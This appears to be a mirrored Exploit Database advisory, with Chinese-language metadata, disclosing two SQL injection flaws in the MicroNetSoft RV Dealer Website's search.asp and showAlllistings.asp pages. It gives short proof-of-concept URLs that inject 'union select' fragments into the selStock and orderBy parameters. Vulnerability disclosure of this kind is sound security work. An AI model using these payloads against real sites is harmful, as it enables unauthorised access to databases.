MicroNetSoft RV Dealer Website – ‘search.asp’ / showAlllistings.asp’ SQL Injection

• Exploit Database
• 36 阅读

• 作者： underground-stockholm.com
  日期： 2010-11-29
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15629/

• TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
  PRODUCT: MicroNetSoft RV Dealer Website
  PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
  RESEARCHERS: underground-stockholm.com
  RESEARCHERS URL: http://underground-stockholm.com/
  
  SQL INJECTION BUGS:
  
  http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
  http://[host]/[path]/showAlllistings.asp?orderBy=union